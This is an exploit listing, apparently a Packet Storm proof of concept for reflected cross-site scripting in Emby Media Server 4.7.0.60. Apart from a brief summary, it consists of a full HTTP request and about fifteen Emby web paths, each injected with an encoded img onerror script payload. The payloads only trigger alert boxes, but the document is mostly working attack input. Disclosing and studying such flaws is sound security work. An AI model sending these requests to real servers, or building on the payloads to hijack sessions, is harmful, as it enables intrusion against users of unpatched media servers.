Exploit for Emby Media Server 4.7.0.60 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:167209
# Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting   
# Google Dork: NA  
# Date: 18/05/2022  
# Exploit Author: Yehia Elghaly  
# Vendor Homepage: https://emby.media/  
# Software Link: https://emby.media/windows-server.html  
# Version: 4.7.0.60  
# Tested on: Windows 7 / 10  
  
  
Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.  
  
Description: Reflected XSS found on the follwoing paths   
  
  
GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1  
Host: 192.168.1.99:8096  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Upgrade-Insecure-Requests: 1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
  
/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60  
/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn   
/web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60  
/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60   
/web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60  
/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60  
/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60  
/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60   
/web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60  
/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60  
/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60  
/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60  
/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60  
/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60